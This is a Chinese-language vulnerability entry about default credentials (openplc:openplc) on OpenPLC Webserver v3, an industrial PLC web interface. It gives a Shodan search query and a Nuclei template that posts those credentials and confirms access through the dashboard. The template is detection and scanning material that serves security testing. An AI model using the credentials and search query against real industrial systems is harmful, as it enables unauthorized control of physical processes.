漏洞信息
漏洞名称: OpenPLC Webserver v3 Default Login Vulnerability
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: OpenPLC Webserver v3是一款用于工业控制系统(ICS)的开源可编程逻辑控制器(PLC)软件,广泛应用于工业自动化领域。该软件的Web界面默认使用用户名和密码均为’openplc’的凭证进行认证,这一弱口令漏洞使得攻击者能够轻易获得未授权访问权限。漏洞的技术根源在于系统出厂时未强制修改默认凭证,导致任何知道默认凭证的用户都能登录系统。这种漏洞的存在可能导致攻击者完全控制PLC系统,进而对工业控制系统造成严重影响,包括但不限于远程代码执行、数据泄露、服务中断等。由于该漏洞不需要任何认证即可利用,且攻击过程可以自动化,因此对工业控制系统构成了严重的安全威胁。
产品厂商: OpenPLC
产品名称: OpenPLC Webserver
影响版本: v3
搜索语法: html:”alt=”OpenPLC””
来源: https://github.com/projectdiscovery/nuclei-templates/blob/5fc012a7075245b167e00316d026bbaeccd9ad2f/http%2Fdefault-logins%2Fopenplc%2Fopenplc-default-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46
| id: openplc-default-login
info: name: OpenPLC Webserver v3 - Default Login author: machevalia severity: high description: | Identifies default credentials (openplc:openplc) on OpenPLC Webserver v3, allowing unauthorized access to the web interface. metadata: shodan-query: html:"alt="OpenPLC"" verified: true max-request: 2 tags: openplc,default-login,iot
variables: username: "openplc" password: "openplc"
http: - raw: - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
- | GET /dashboard HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "Dashboard" - "Runtime Logs" condition: and
- type: status status: - 200
|